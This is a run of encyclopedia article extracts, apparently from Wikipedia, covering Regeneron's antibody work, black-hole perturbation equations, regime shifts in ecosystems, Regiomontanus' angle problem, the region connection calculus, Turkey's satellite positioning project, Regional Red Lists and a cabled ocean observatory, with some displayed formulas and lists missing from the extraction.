In October 2020 when U.S. President Donald Trump was infected with COVID-19 and taken to Walter Reed National Military Medical Center in Bethesda, Maryland , he was administered REGN-COV2 . [ 27 ] His doctors obtained it from Regeneron via a compassionate use request (as clinical trials had not yet been completed and the drug had not yet been approved by the US Food and Drug Administration (FDA)). [ 28 ] On October 7, Trump posted a five-minute video to Twitter reasserting that this drug should be "free." [ 29 ] That same day, Regeneron filed with the FDA for emergency use authorization. In the filing, it specified that it currently had 50,000 doses and that it expected to reach a total of 300,000 doses "within the next few months." [ 30 ] The FDA granted approval for emergency use authorization in November 2020. [ 31 ]
Trap Fusion Proteins: Regeneron's novel and patented Trap technology creates high-affinity product candidates for many types of signaling molecules, including growth factors and cytokines. The Trap technology involves fusing two distinct fully human receptor components and a fully human immunoglobulin-G constant region. [ citation needed ]
Fully Human Monoclonal Antibodies: Regeneron has developed a suite (VelociSuite) of patented technologies, including VelocImmune and VelociMab, that allow Regeneron scientists to determine the best targets for therapeutic intervention and rapidly generate high-quality, fully human antibodies drug candidates addressing these targets. [ 43 ] : 255–258
The founders Leonard Schleifer and George Yancopoulos are reported to hold $1.3 billion and $900 million in company stock, respectively. Both are from Queens, New York . [ 3 ] Schleifer was formerly a professor of medicine at Weill Cornell Medical School . Yancopoulos was a post-doctoral fellow, and MD/PhD student at Columbia University . Yancopoulos was involved in each drug's development. [ 3 ] | https://en.wikipedia.org/wiki/Regeneron_Pharmaceuticals |
In general relativity , Regge–Wheeler–Zerilli equations are a pair of equations that describe gravitational perturbations of a Schwarzschild black hole , named after Tullio Regge , John Archibald Wheeler and Frank J. Zerilli. [ 1 ] [ 2 ] The perturbations of a Schwarzchild metric is classified into two types, namely, axial and polar perturbations, a terminology introduced by Subrahmanyan Chandrasekhar . Axial perturbations induce frame dragging by imparting rotation to the black hole and change sign when the azimuthal direction is reversed, whereas polar perturbations do not impart rotation and do not change sign under the reversal of azimuthal direction. The equation for axial perturbations is called Regge–Wheeler equation and the equation governing polar perturbations is called Zerilli equation .
When assuming an harmonic time-dependence, the equations take the same form of the one-dimensional Schrödinger equation . The equations read as [ 3 ]
where Z + {\displaystyle Z^{+}} characterises the polar perturbations and Z − {\displaystyle Z^{-}} the axial perturbations. Here r ∗ = r + 2 M ln ( r / 2 M − 1 ) {\displaystyle r_{*}=r+2M\ln(r/2M-1)} is the tortoise coordinate (we set G = c = 1 {\displaystyle G=c=1} ), r {\displaystyle r} belongs to the Schwarzschild coordinates ( t , r , θ , φ ) {\displaystyle (t,r,\theta ,\varphi )} , 2 M {\displaystyle 2M} is the Schwarzschild radius and σ {\displaystyle \sigma } represents the time frequency of the perturbations appearing in the form e i σ t {\displaystyle e^{i\sigma t}} . The Regge–Wheeler potential and Zerilli potential are respectively given by
where 2 n = ( l − 1 ) ( l + 2 ) {\displaystyle 2n=(l-1)(l+2)} and l = 2 , 3 , 4 , … {\displaystyle l=2,3,4,\dots } characterizes the eigenmode for the θ {\displaystyle \theta } coordinate. For gravitational perturbations, the modes l = 0 , 1 {\displaystyle l=0,\,1} are irrelevant because they do not evolve with time. Physically gravitational perturbations with l = 0 {\displaystyle l=0} (monopole) mode represents a change in the black hole mass, whereas the l = 1 {\displaystyle l=1} (dipole) mode corresponds to a shift in the location and value of the black hole's angular momentum. The shape of above potentials are exhibited in the figure.
In tortoise coordinates, r ∗ → − ∞ {\displaystyle r_{*}\rightarrow -\infty } denotes the event horizon and r ∗ → ∞ {\displaystyle r_{*}\rightarrow \infty } is equivalent to r → ∞ {\displaystyle r\rightarrow \infty } i.e., to distances far away from the back hole. The potentials are short-ranged as they decay faster than 1 / r ∗ {\displaystyle 1/r_{*}} ; as r ∗ → ∞ {\displaystyle r_{*}\rightarrow \infty } we have V ± → 2 ( n + 1 ) / r 2 {\displaystyle V^{\pm }\rightarrow 2(n+1)/r^{2}} and as r ∗ → − ∞ {\displaystyle r_{*}\rightarrow -\infty } , we have V ± ∼ e r ∗ / 2 M . {\displaystyle V^{\pm }\sim e^{r_{*}/2M}.} Consequently, the asymptotic behaviour of the solutions for r ∗ → ± ∞ {\displaystyle r_{*}\rightarrow \pm \infty } is e ± i σ r ∗ . {\displaystyle e^{\pm i\sigma r_{*}}.}
In 1975, Subrahmanyan Chandrasekhar and Steven Detweiler discovered a one-to-one mapping between the two equations, leading to a consequence that the spectrum corresponding to both potentials are identical. [ 4 ] The two potentials can also be written as
The relations between Z + {\displaystyle Z^{+}} and Z − {\displaystyle Z^{-}} are given by [ 3 ]
Here V ± {\displaystyle V^{\pm }} is always positive and the problem is one of reflection and transmission of waves incident from r ∗ → ∞ {\displaystyle r_{*}\rightarrow \infty } to r ∗ → − ∞ {\displaystyle r_{*}\rightarrow -\infty } . The problem is essentially the same as that of a reflection and transmission problem by a potential barrier in quantum mechanics. Let the incident wave with unit amplitude be e + i σ r ∗ {\displaystyle e^{+i\sigma r_{*}}} , then the asymptotic behaviours of the solution are given by
where R = R ( σ ) {\displaystyle R=R(\sigma )} and T = T ( σ ) {\displaystyle T=T(\sigma )} are respectively the reflection and transmission amplitudes. In the second equation, we have imposed the physical requirement that no waves emerge from the event horizon.
The reflection and transmission coefficients are thus defined as
subjected to the condition R ± + T ± = 1. {\displaystyle {\mathcal {R}}^{\pm }+{\mathcal {T}}^{\pm }=1.} Because of the inherent connection between the two equations as outlined in the previous section, it turns out [ 3 ]
and thus consequently, since R + {\displaystyle R^{+}} and R − {\displaystyle R^{-}} differ only in their phases, we get
It is clear from the figure for the reflection coefficient that small-frequency perturbations are readily reflected by the black hole whereas large-frequency ones are absorbed by the black hole. The transition arises around the fundamental quasi-normal mode frequency (see below) for each multipole.
Quasi-normal modes correspond to pure tones of the black hole. These tones are excited when arbitrary, but small, perturbations imping on a black hole, such as an object falling into it, accretion of matter surrounding it, the last stage of slightly aspherical collapse, the last stage of a binary merger etc. Unlike the reflection and transmission coefficient problem, quasi-normal modes are characterised by complex-valued σ {\displaystyle \sigma } 's with the convention R e { σ } > 0 {\displaystyle \mathrm {Re} \{\sigma \}>0} . The required boundary conditions are
indicating that we have purely outgoing waves with amplitude A ± {\displaystyle A^{\pm }} and purely ingoing waves at the horizon.
The problem becomes an eigenvalue problem. The quasi-normal modes are of damping type in time, although these waves diverge in space as r ∗ → ± ∞ {\displaystyle r^{*}\to \pm \infty } (this is due to the implicit assumption that the perturbation in quasi-normal modes is 'infinite' in the remote past) [ 3 ] . Again because of the relation mentioned between the two problem, the spectrum of Z + {\displaystyle Z^{+}} and Z − {\displaystyle Z^{-}} are identical and thus it enough to consider the spectrum of Z − . {\displaystyle Z^{-}.} The problem is simplified by introducing [ 4 ]
The nonlinear eigenvalue problem is given by
The solution is found to exist only for a discrete set of values of σ . {\displaystyle \sigma .} [ 5 ] This equation also implies the identity | https://en.wikipedia.org/wiki/Regge–Wheeler–Zerilli_equations |
Regia is a classical building type, a place where a governing authority resides. [ 1 ] [ 2 ] It is among the ancient building types. Others are the tholos , the temple, the theater, the dwelling, and the shop. Buildings according to this type may be rectangular in plan with an interior courtyard . [ 3 ]
This architecture -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regia_(architecture) |
Regime shifts are large, abrupt, persistent changes in the structure and function of ecosystems , the climate , financial and economic systems or other complex systems . [ 1 ] [ 2 ] [ 3 ] [ 4 ] A regime is a characteristic behaviour of a system which is maintained by mutually reinforced processes or feedbacks . Regimes are considered persistent relative to the time period over which the shift occurs. The change of regimes, or the shift, usually occurs when a smooth change in an internal process ( feedback ) or a single disturbance (external shocks) triggers a completely different system behavior. [ 5 ] [ 6 ] [ 7 ] [ 8 ] Although such non-linear changes have been widely studied in different disciplines ranging from atoms to climate dynamics, [ 9 ] regime shifts have gained importance in ecology because they can substantially affect the flow of ecosystem services that societies rely upon, [ 4 ] [ 10 ] such as provision of food, clean water or climate regulation. Moreover, regime shift occurrence is expected to increase as human influence on the planet increases – the Anthropocene [ 11 ] – including current trends on human induced climate change and biodiversity loss . [ 12 ] When regime shifts are associated with a critical or bifurcation point , they may also be referred to as critical transitions . [ 3 ]
Scholars have been interested in systems exhibiting non-linear change for a long time. Since the early twentieth century, mathematicians have developed a body of concepts and theory for the study of such phenomena based on the study of non-linear system dynamics. This research led to the development of concepts such as catastrophe theory ; a branch of bifurcation theory in dynamical systems.
In ecology the idea of systems with multiple regimes, domains of attraction called alternative stable states , only arose in the late '60s based upon the first reflections on the meaning of stability in ecosystems by Richard Lewontin [ 1 ] and Crawford "Buzz" Holling . [ 2 ] The first work on regime shifts in ecosystems was done in a diversity of ecosystems and included important work by Noy-Meir (1975) in grazing systems ; [ 13 ] May (1977) in grazing systems, harvesting systems, insect pests and host- parasitoid systems; [ 14 ] Jones and Walters (1976) with fisheries systems; [ 15 ] and Ludwig et al. (1978) with insect outbreaks . [ 16 ]
These early efforts to understand regime shifts were criticized for the difficulty of demonstrating bi-stability, their reliance on simulation models, and lack of high quality long-term data. [ 17 ] However, by the 1990s more substantial evidence of regime shifts was collected for kelp forest , coral reefs , drylands and shallow lakes. This work led to revitalization of research on ecological reorganization and the conceptual clarification that resulted in the regime shift conceptual framework in the early 2000s. [ 5 ] [ 6 ] [ 7 ] [ 8 ]
Outside of ecology, similar concepts of non-linear change have been developed in other academic disciplines. One example is historical institutionalism in political science , sociology and economics , where concepts like path dependency and critical junctures are used to explain phenomena where the output of a system is determined by its history, or the initial conditions, and where its domains of attraction are reinforced by feedbacks. Concept such as international institutional regimes , socio-technical transitions and increasing returns have an epistemological basis similar to regime shifts, and utilize similar mathematical models.
During the last decades, research on regime shift has grown exponentially. Academic papers reported by ISI Web of Knowledge rose from less than 5 per year prior to 1990 to more than 300 per year from 2007 to 2011. However, the application of regime shift related concepts is still contested.
Although there is not agreement on one definition, the slight differences among definitions reside on the meaning of stability – the measure of what a regime is – and the meaning of abruptness. Both depend on the definition of the system under study, thus it is relative. At the end it is a matter of scale. Mass extinctions are regime shifts on the geological time scale , while financial crises or pest outbreaks are regime shifts that require a totally different parameter setting.
In order to apply the concept to a particular problem, one has to conceptually limit its range of dynamics by fixing analytical categories such as time and space scales, range of variations and exogenous / endogenous processes. For example, while for oceanographers a regime must last for at least decades and should include climate variability as a driver, [ 17 ] for marine biologists regimes of only five years are acceptable and could be induced by only population dynamics. [ 18 ] A non-exhaustive range of current definitions of regime shifts in recent scientific literature from ecology and allied fields is collected in Table 1.
Table 1. Definitions of regime shifts and modifications used to apply the concept to particular research questions from scientific literature published between 2004 and 2009.
The theoretical basis for regime shifts has been developed from the mathematics of non-linear systems. In short, regime shifts describe dynamics characterized by the possibility that a small disturbance can produce big effects. In such situations the common notion of proportionality between inputs and outputs of a system is incorrect. Conversely, the regime shift concept also emphasizes the resilience of systems – suggesting that in some situations substantial management or human impact can have little effect on a system. Regime shifts are hard to reverse and in some cases irreversible. The regime shift concept shifts analytical attention away from linearity and predictability, towards reorganization and surprise. Thus, the regime shift concept offers a framework to explore the dynamics and causal explanations of non-linear change in nature and society.
Regime shifts are triggered either by the weakening of stabilizing internal processes – feedbacks – or by external shocks which exceed the stabilizing capacity of a system.
Systems prone to regime shifts can show three different types of change: smooth, abrupt or discontinuous, [ 6 ] depending on the configuration of processes that define a system – in particular the interaction between a system's fast and slow processes. Smooth change can be described by a quasi-linear relationship between fast and slow processes; abrupt change shows a non-linear relationship among fast and slow variables, while discontinuous change is characterized by the difference in the trajectory on the fast variable when the slow one increases compared to when it decreases. [ 17 ] In other words, the point at which the system flips from one regime to another is different from the point at which the system flips back. Systems that exhibit this last type of change demonstrate hysteresis . Hysteretic systems have two important properties. First, the reversal of discontinuous change requires that a system change back past the conditions at which the change first occurred. [ 5 ] This occurs because systemic change alters feedback processes that maintain a system in a particular regime. [ 22 ] Second, hysteresis greatly enhances the role of history in a system, and demonstrates that the system has memory – in that its dynamics are shaped by past events.
Conditions at which a system shifts its dynamics from one set of processes to another are often called thresholds. In ecology for example, a threshold is a point at which there is an abrupt change in an ecosystem quality, property or phenomenon; or where small changes in an environmental driver produce large responses in an ecosystem. [ 23 ] Thresholds are, however, a function of several interacting parameters, thus they change in time and space. Hence, the same system can present smooth, abrupt or discontinuous change depending on its parameters' configurations. Thresholds will be present, however, only in cases where abrupt and discontinuous change is possible.
Empirical evidence has increasingly completed model based work on regime shifts. Early work on regime shifts in ecology was developed in models for predation, grazing, fisheries and inset outbreak dynamics. Since the 1980s, further development of models has been complemented by empirical evidence for regime shifts from ecosystems including kelp forest , coral reefs , drylands and lakes .
Scholars have collected evidence for regime shifts across a wide variety of ecosystems and across a range of scales. For example, at the local scale, one of the best documented examples is woody plant encroachment , which is thought to follow a smooth change dynamic. [ 7 ] Woody encroachment refers to small changes in herbivory rates that can shift drylands from grassy dominated regimes towards woody dominated savannas. Encroachment has been documented to impact ecosystem services related with cattle ranching in wet savannas in Africa and South America. [ 24 ] [ 25 ] [ 26 ] At the regional scale, rainforest areas in the Amazon and East Asia are thought to be at risk of shifting towards savanna regimes given the weakening of the moisture recycling feedback driven by deforestation . [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] The shift from forest to savanna potentially affects the provision of food, fresh water, climate regulation and support for biodiversity. On the global realm, the faster retreating of the arctic ice sheet in summer time is reinforcing climate warming through the albedo feedback, potentially affecting sea water levels and climate regulation worldwide.
Aquatic systems have been heavily studied in the search for regime shifts. Lakes work like microcosms (almost closed systems ) that to some extent allow experimentation and data gathering. [ 2 ] [ 33 ] [ 34 ] Eutrophication is a well-documented abrupt change from clear water to murky water regimes, which leads to toxic algae blooms and reduction of fish productivity in lakes and coastal ecosystems. [ 33 ] [ 35 ] [ 36 ] Eutrophication is driven by nutrient inputs, particularly those coming from fertilizers used in agriculture. It is an example of discontinuous change with hysteresis. Once the lake has shifted to a murky water regime, a new feedback of phosphorus recycling maintains the system in the eutrophic state even if nutrient inputs are significantly reduced.
Another example widely studied in aquatic and marine systems is trophic level decline in food webs . It usually implies the shift from ecosystems dominated by high numbers of predatory fish to a regime dominated by lower trophic groups like pelagic planktivores (i.e. jellyfish). [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] Affected food webs often have impacts on fisheries productivity, a major risk of eutrophication , hypoxia , invasion of non-native species and impacts on recreational values. Hypoxia, or the development of so-called death zones, is another regime shift in aquatic and marine-coastal environments. Hypoxia, similarly to eutrophication, is driven by nutrient inputs of anthropogenic origin but also from natural origin in the form of upwellings . In high nutrient concentrations the levels of dissolved oxygen decrease, making life impossible for the majority of aquatic organisms. [ 42 ] Impacts on ecosystem services include collapse of fisheries and the production of toxic gases for humans.
In marine systems, two well-studied regime shifts happen in coral reefs and kelp forests. Coral reefs are three-dimensional structures which work as habitat for marine biodiversity. Hard coral-dominated reefs can shift to a regime dominated by fleshy algae; [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] but they also have been reported to shift towards soft-corals, corallimorpharians, urchin barrens or sponge-dominated regimes. [ 18 ] [ 48 ] Coral reef transitions are reported to affect ecosystem services like calcium fixation, water cleansing, support for biodiversity, fisheries productivity, coastline protection and recreational services. [ 49 ] [ 50 ] On the other hand, kelp forests are highly productive marine ecosystems found in temperate regions of the ocean. Kelp forests are characteristically dominated by brown macroalgae and host high levels of biodiversity, providing provisioning ecosystem services for both the cosmetic industry and fisheries. Such services are substantially reduced when a kelp forest shifts towards urchin barren regimes driven mainly by discharge of nutrients from the coast and overfishing. Overfishing and overharvest of keystone predators, such as sea otters , applies top-down pressure on the system. Bottom-up pressure arises from nutrient pollution . [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ]
Soil salinization is an example of a well-known regime shift in terrestrial systems. It is driven by the removal of deep root vegetation and irrigation, which causes elevation of the soil water table and the increase of soil surface salinity. Once the system flips, ecosystem services related with food production – both crops and cattle – are significantly reduced. [ 57 ] Dryland degradation , also known as desertification , is a well-known but controversial type of regime shift. Dryland degradation occurs when the loss of vegetation transforms an ecosystem from being vegetated to being dominated by bare soils. While this shift has been proposed to be driven by a combination of farming and cattle grazing, loss of semi-nomad traditions, extension of infrastructure, reduction of managerial flexibility and other economic factors, it is controversial because it has been difficult to determine whether there is indeed a regime shift and which drivers have caused it. For example, poverty has been proposed as a driver of dry land degradation, but studies continuously find contradictory evidence. [ 58 ] [ 59 ] [ 60 ] [ 61 ] Ecosystem services affected by dry land degradation usually include low biomass productivity, thus reducing provisioning and supporting services for agriculture and water cycling.
Polar regions have been the focus on research examining the impacts of climate warming. Regime shifts in polar regions include the melting of the Greenland ice sheet and the possible collapse of the thermohaline circulation system. While the melting of the Greenland ice sheet is driven by global warming and threatens worldwide coastlines with an increase of sea level, the collapse of the thermohaline circulation is driven by the increase of fresh water in the North Atlantic which in turn weakens the density driven water transport between the tropics and polar areas. [ 62 ] [ 63 ] Both regime shifts have serious implications for marine biodiversity, water cycling, security of housing and infrastructure and climate regulation amongst other ecosystem services.
Using current well-known statistical methods such as average standard deviates , principal component analysis , or artificial neural networks [ 64 ] [ 20 ] one can detect whether a regime shift has occurred. Such analyses require long term data series and that the threshold under study has to be crossed. [ 20 ] Hence, the answer will depend on the quality of the data; it is event-driven and only allows one to explore past trends.
Some scholars have argued based on statistical analysis of time series that certain phenomena do not correspond to regime shifts. [ 65 ] [ 66 ] [ 67 ] [ 68 ] Nevertheless, the statistical rejection of the hypothesis that a system has multiple attractors does not imply that the null hypothesis is true. [ 6 ] In order to do so one has to prove that the system only has one attractor. In other words, evidence that data does not exhibit multiple regimes does not rule out the possibility a system could shift to an alternative regime in the future. Moreover, in management decision making, it can be risky to assume that a system has only one regime, when plausible alternative regimes have highly negative consequences. [ 6 ]
On the other hand, a more relevant question than "has a regime shift occurred?" is "is the system prone to regime shifts?". This question is important because, even if they have shown smooth change in the past, their dynamics can potentially become abrupt or discontinuous in the future depending on its parameters' configuration. Such a question has been explored separately in different disciplines for different systems, pushing methods development forward (e.g. climate driven regime shifts in the ocean [ 66 ] or the stability of food webs [ 69 ] [ 70 ] ) and continuing to inspire new research.
Regime shift research is occurring across multiple ecosystems and at multiple scales. New areas of research include early warnings of regime shifts and new forms of modeling.
It remains unclear how well such signals work for all regime shifts, and if the early warnings give time enough to take appropriate managerial corrections to avoid the shift. [ 82 ] [ 4 ] Additionally, early warning signals also depend on intensive good-quality data series that are rare in ecology. However, researchers have used high quality data to predict regime shifts in a lake ecosystem. [ 83 ] Changes in spatial patterns as an indicator of regime shifts have also become a topic of research. [ 30 ] [ 84 ] [ 85 ]
Another front of research is the development of new approaches to modeling. Dynamic models , [ 86 ] [ 87 ] Bayesian belief networks , [ 88 ] Fisher information , [ 89 ] and fuzzy cognitive maps [ 90 ] have been used as a tool to explore the phase space where regime shifts are likely to happen and understand the dynamics that govern dynamic thresholds. Models are useful oversimplifications of reality, whose limits are given by the current understanding of the real system as well as the assumptions of the modeler. Therefore, a deep understanding of causal relationships and the strength of feedbacks is required to capture possible regime shift dynamics. Nevertheless, such deep understanding is available only for heavily studied systems such as shallow lakes. Methods development is required to tackle the problem of limited time series data and limited understanding of system dynamics , in such a way that allow identification of the main drivers of regime shifts as well as prioritization of managerial options.
Other emerging areas of research include the role of regime shifts in the earth system, cascading consequences among regime shifts, and regime shifts in social-ecological systems. | https://en.wikipedia.org/wiki/Regime_shift |
The Regiment of the North Pole , a medieval outdated astronomy term, is a rule saying how to find the celestial North Pole by the stars. It was used in former centuries when, because of precession , the star Polaris was much further from the celestial North Pole than it is now.
As at AD2000 precession epoch , the rule would be: "From Polaris , go directly away from the Pointers (βγ Ursae Minoris ) by about 1.45 times the apparent diameter of the Full Moon ."
This astronomy -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regiment_of_the_North_Pole |
Regina is a suite of mathematical software for 3-manifold topologists . It focuses upon the study of 3-manifold triangulations and includes support for normal surfaces and angle structures. [ 1 ]
This topology-related article is a stub . You can help Wikipedia by expanding it .
This scientific software article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regina_(program) |
In mathematics , the Regiomontanus's angle maximization problem , is a famous optimization problem [ 1 ] posed by the 15th-century German mathematician Johannes Müller [ 2 ] (also known as Regiomontanus ). The problem is as follows:
If the viewer stands too close to the wall or too far from the wall, the angle is small; somewhere in between it is as large as possible.
The same approach applies to finding the optimal place from which to kick a ball in rugby. [ 3 ] For that matter, it is not necessary that the alignment of the picture be at right angles: we might be looking at a window of the Leaning Tower of Pisa or a realtor showing off the advantages of a sky-light in a sloping attic roof.
There is a unique circle passing through the top and bottom of the painting and tangent to the eye-level line. By elementary geometry, if the viewer's position were to move along the circle, the angle subtended by the painting would remain constant . All positions on the eye-level line except the point of tangency are outside of the circle, and therefore the angle subtended by the painting from those points is smaller.
The point of tangency can be constructed by the following steps: [ 4 ] [ 5 ]
This can be shown to correctly construct the point of tangency by using Euclid's Elements , Book III, Proposition 36 (alternatively the power-of-a-point theorem ) to show that the distance from the wall to the point of tangency is the geometric mean of the heights of the top and bottom of the painting. Equivalently, a square with this distance as its side length has the same area as a rectangle with the two heights as its sides. Then, the construction of a circle with the top of the painting diametrically opposite the reflected bottom, and its intersection with the line at eye level, follows Euclid's Book II, Proposition 14, which describes how to construct a square with the same area as a given rectangle.
In the present day, this problem is widely known because it appears as an exercise in many first-year calculus textbooks (for example that of Stewart [ 6 ] ).
Let
The angle we seek to maximize is β − α . The tangent of the angle increases as the angle increases; therefore it suffices to maximize
Since b − a is a positive constant, we only need to maximize the fraction that follows it. Differentiating, we get
Therefore the angle increases as x goes from 0 to √ ab and decreases as x increases from √ ab . The angle is therefore as large as possible precisely when x = √ ab , the geometric mean of a and b .
We have seen that it suffices to maximize
This is equivalent to minimizing the reciprocal:
Observe that this last quantity is equal to
Thus when we have u 2 + v 2 , we can add the middle term −2 uv to get a perfect square. We have
If we regard x as u 2 and ab / x as v 2 , then u = √ x and v = √ ab / x , and so
Thus we have
This is as small as possible precisely when the square is 0, and that happens when x = √ ab . Alternatively, we might cite this as an instance of the inequality between the arithmetic and geometric means. | https://en.wikipedia.org/wiki/Regiomontanus'_angle_maximization_problem |
The region connection calculus ( RCC ) is intended to serve for qualitative spatial representation and reasoning . RCC abstractly describes regions (in Euclidean space , or in a topological space ) by their possible relations to each other. RCC8 consists of 8 basic relations that are possible between two regions:
From these basic relations, combinations can be built. For example, proper part (PP) is the union of TPP and NTPP.
RCC is governed by two axioms. [ 1 ]
The two axioms describe two features of the connection relation, but not the characteristic feature of the connect relation. [ 2 ] For example, we can say that an object is less than 10 meters away from itself and that if object A is less than 10 meters away from object B, object B will be less than 10 meters away from object A. So, the relation 'less-than-10-meters' also satisfies the above two axioms, but does not talk about the connection relation in the intended sense of RCC.
The composition table of RCC8 are as follows:
Usage example: if a TPP b and b EC c, (row 4, column 2) of the table says that a DC c or a EC c.
The RCC8 calculus is intended for reasoning about spatial configurations. Consider the following example: two houses are connected via a road. Each house is located on an own property. The first house possibly touches the boundary of the property; the second one surely does not. What can we infer about the relation of the second property to the road?
The spatial configuration can be formalized in RCC8 as the following constraint network :
Using the RCC8 composition table and the path-consistency algorithm , we can refine the network in the following way:
That is, the road either overlaps (PO) property2 , or is a tangential proper part of it. But, if the road is a tangential proper part of property2 , then the road can only be externally connected (EC) to property1 . That is, road PO property1 is not possible when road TPP property2 . This fact is not obvious, but can be deduced once we examine the consistent "singleton-labelings" of the constraint network. The following paragraph briefly describes singleton-labelings.
First, we note that the path-consistency algorithm will also reduce the possible properties between house2 and property1 from { DC, EC } to just DC . So, the path-consistency algorithm leaves multiple possible constraints on 5 of the edges in the constraint network. Since each of the multiple constraints involves 2 constraints, we can reduce the network to 32 (2 5 ) possible unique constraint networks, each containing only single labels on each edge ( "singleton labelings "). However, of the 32 possible singleton labelings, only 9 are consistent. (See qualreas for details.) Only one of the consistent singleton labelings has the edge road TPP property2 and the same labeling includes road EC property1 .
Other versions of the region connection calculus include RCC5 (with only five basic relations - the distinction whether two regions touch each other are ignored) and RCC23 (which allows reasoning about convexity).
RCC8 has been partially [ clarification needed ] implemented in GeoSPARQL as described below: | https://en.wikipedia.org/wiki/Region_connection_calculus |
The Regional Positioning and Timing System ( Turkish : Bölgesel Konumlama ve Zamanlama Sistemi ), shortly BKZS , is a space-based project of the Turkish Armed Forces on global positioning and time transfer by satellite navigation system .
The aim of the project is to provide positioning and timing information, which Turkish Armed Forces need during peace, crisis and military operations , independently from the existing foreign systems, which can be disabled in times of conflict. [ 1 ] The project is developed by the Defence Technologies and Engineering Inc. (Savunma Teknolojileri ve Mühendislik A.Ş.) (STM), a subsidiary of the Undersecretariat for Defence Industries. Currently, the project is in the first phase, comprising evaluation of the feasibility study. [ 2 ] [ 3 ] It is planned to launch five military reconnaissance and Earth observation satellites over the next few years. [ 4 ] [ obsolete source ]
This space - or spaceflight -related article is a stub . You can help Wikipedia by expanding it .
This article about the military of Turkey is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regional_Positioning_and_Timing_System_(Turkey) |
A Regional Red List is a report of the threatened status of species within a certain country or region. It is based on the IUCN Red List of Threatened Species, an inventory of the conservation status of species on a global scale. Regional Red Lists assess the risk of extinction to species within a political management unit and therefore may feed directly into national and regional planning. This project is coordinated by the Zoological Society of London , the World Conservation Union (IUCN) and partners in national governments, universities and organizations throughout the world.
Regional Red Lists may assist countries or regions in:
The IUCN Categories and Criteria were initially designed to assess the conservation status of species globally, however there was a demand for guidelines to apply the system at the regional level. In 2003, IUCN developed a set of transparent, quantitative criteria to assess the conservation status of species at the regional and national level. This approach is now being applied in many countries throughout the world.
Recently, Regional Red Lists have been completed for Mongolian Mammals and Fishes. These have also been accompanied by Summary Conservation Action Plans, detailing recommended conservation measures for each threatened species.
A Regional Red List may be created by any country or organisation by following the clear, repeatable protocol. The process is as follows:
In April 2002 at the Convention on Biological Diversity (CBD), 188 nations committed themselves to actions to “…achieve, by 2010, a significant reduction of the current rate of biodiversity loss at the global, regional and national levels…”.
When a Regional Red List is compiled at regular intervals, it can provide information about how the status of the region's biodiversity is changing over time. This information may be useful to policy makers, conservationists, and the general public, as it may assist countries in meeting their obligation to the CBD.
Currently, a global network of countries and individuals working on Regional Red Lists is being developed. This will include a centralised online database where Regional Red List assessments and Action Plans can be stored, managed, and made accessible. With this regional network there will be opportunities to learn from each other's experiences in applying the IUCN Categories and Criteria and in using this information for conservation planning and priority setting.
Two public bodies in Britain, Natural England and the Joint Nature Conservation Committee (JNCC), have produced British Red Data Books and other reviews of different plants and animals assigning their conservation status according to IUCN Red Data Book criteria. [ 1 ] In 2016 the JNCC produced a spreadsheet which incorporated these reviews and lists of threatened species based on other criteria such as Biodiversity Action Plan Priority Lists and Schedules of the Wildlife & Countryside Act . [ 2 ]
Natural England uses the following definitions for uncommon species not rare enough to be included in the Red Data Book: | https://en.wikipedia.org/wiki/Regional_Red_List |
The National Science Foundation's (NSF) Ocean Observatories Initiative (OOI) Regional Scale Nodes (RSN) component is an electro-optically cabled underwater observatory that directly connects to the global Internet . It is the largest cable-linked seabed observatory in the world , and also the first of its kind in the United States .
Located on the southern part of the Juan de Fuca Plate , off the coast of Washington and Oregon , it is the first ocean observatory to span a tectonic plate .
RSN utilizes several high-power , high-bandwidth sub-sea terminals called primary nodes which are linked together by fiber-optic cable and provide support to oceanographic sensors at key locations .
Upon completion of the network in 2014, RSN will cover a distance of over 900 kilometers at depths of up to 3000 meters. Implementation of the OOI Regional Scale Nodes is led by the University of Washington's (UW) School of Oceanography , the UW Applied Physics Laboratory , and L-3 MariPro .
Live RSN data from >100 seafloor and water column instruments will be made available live on the Internet. This will allow both scientists and the general public to study long-term changes in ocean systems over the next 25 years.
Construction of RSN will be completed in 2014. Efforts are substantially aided by the crews of ROPOS (Remotely Operated Platform for Observation Sciences . The 83-day VISIONS ’14 expedition aboard the 274-foot global-class R/V Thomas G. Thompson is responsible for the observatory's final implementation.
The Regional Scale Nodes (RSN) is a component of the National Science Foundation's (NSF's) Ocean Observatories Initiative (OOI). The NSF's OOI is managed and coordinated by the OOI Project Office at the Consortium for Ocean Leadership (COL) in Washington, D.C. The UW, located in Seattle , Washington, is the RSN Implementing Organization for the COL.
The vision behind RSN is to launch a new era of scientific discovery and understanding of the oceans.
The RSN consists of two infrastructures : primary and secondary. The primary infrastructure network, which was designed, qualified, manufactured, and installed in 2012 by L-3 Maripro , consists of a shore facility located in Pacific City, Oregon ; two fiber-optic cable lines covering a distance of 800 kilometers, and seven primary science nodes.
The RSN system delivers 200 kilowatts of power and 240Gbit/s of TCP/IP Internet data communications to the seven primary science nodes. RSN is designed to last for 25 years and is capable of significant expansion to serve future science needs.
Prior to the emergence of underwater cabled observatories, oceanographers and other researchers studying the global ocean tended to rely on the use of research vessels and crewed submersibles in order to collect data. This was followed by a shift toward Remote Operated Vehicles (ROV's) and space-based research satellites . The limitation to these methods was that they were either not cost-effective, or data could only be collected for short durations. While the importance of expedition-based exploration was recognized, a solution was needed.
In 1987, the concept of utilizing high-power, high-bandwidth underwater cabled observatories emerged as a long-term, cost-effective solution for conducting real-time monitoring of ocean systems.
In the early 1990s, the United States and Canada formed an agreement to develop a plate-scale submarine electro-optically cabled ocean observatory in the northeast Pacific Ocean. This region is home to the smallest of Earth's tectonic plates – the Juan de Fuca plate. The small size and close coastal proximity of the Juan de Fuca plate presents a unique opportunity to observe the dynamic systems in submarine volcano regions.
The partnership between the U.S. and Canada developed into a plan to build a Canadian cabled array that would cover the upper 1/3 of the Juan de Fuca plate, and a U.S. system spanning the lower 2/3 of the plate (cite). Together, this plate-scale observatory would be called NEPTUNE (Northeast Pacific Time Series Underwater Networked Experiments) and would provide continuous observations for 25 years.
